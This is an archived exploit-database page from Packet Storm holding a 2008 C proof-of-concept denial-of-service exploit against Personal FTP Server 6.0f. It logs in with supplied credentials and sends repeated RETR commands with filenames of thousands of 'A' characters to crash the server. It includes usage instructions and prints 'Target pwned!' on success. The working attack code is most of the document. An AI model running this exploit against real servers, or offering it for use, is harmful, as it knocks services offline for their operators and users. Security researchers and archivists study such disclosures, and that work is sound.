exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

personalftp-dos.txt

personalftp-dos.txt
Posted Sep 14, 2008
Authored by Shinnok

The Personal FTP Server version 6.0f RETR denial of service exploit.

tags | exploit, denial of service
SHA-256 | 276ccf181969240ca69b86ed1602aa57d2c226fa7dca9dd807540365d8d508a7

personalftp-dos.txt

Change Mirror Download
/*
*** The Personal FTP Server 6.0f RETR DOS exploit ***

A vulnerability exists in the way Personal FTP Server handles
multiple RETR commands with overly long filenames.When confronted
with such consecutive requests the server will crash.

Usage : ./pftpdos ip port user password
Ex. : ./pftpdos 127.0.0.1 21 test test

Personal FTP Server homepage: http://www.michael-roth-software.de/

Discovey + POC by Shinnok raydenxy [at] yahoo <dot> com
http://shinnok.evonet.ro

*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <string.h>
#include <malloc.h>
#include <errno.h>

int
min (int x, int y)
{
if (x < y)return x;
else
return y;
}
extern int errno;

int
main (int argc, char *argv[])
{
struct sockaddr_in server;
int i, t, s;
char *req, *buff;
s = socket (AF_INET, SOCK_STREAM, 0);
bzero (&server, sizeof (server));
server.sin_family = AF_INET;
server.sin_addr.s_addr = inet_addr (argv[1]);
server.sin_port = htons (atoi (argv[2]));
connect (s, (struct sockaddr *) &server, sizeof (struct sockaddr));
req = malloc (sizeof (char) * \
(((strlen (argv[3]) - strlen (argv[4])) + \
min (strlen (argv[3]), strlen (argv[4])) + 8)));
sprintf (req, "USER %s\xD\xA", argv[3]);
write (s, req, strlen (req));
sprintf (req, "PASS %s\xD\xA", argv[4]);
write (s, req, strlen (req));
free (req);
for (i = 1; i <= 5; i++)
{
t = (sizeof (char) * 1000 * i);
buff = malloc (t + 1);
memset (buff, 'A', t);
buff[t + 1] = '\0';
req = malloc (t + 9);
sprintf (req, "RETR %s\xD\xA", buff);
if (write (s, req, strlen (req)) == -1)
{
perror (NULL);
printf ("Target pwned!\n", errno);
}
free (req);
free (buff);
sleep (1);
}
close (s);
return (EXIT_SUCCESS);
}


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close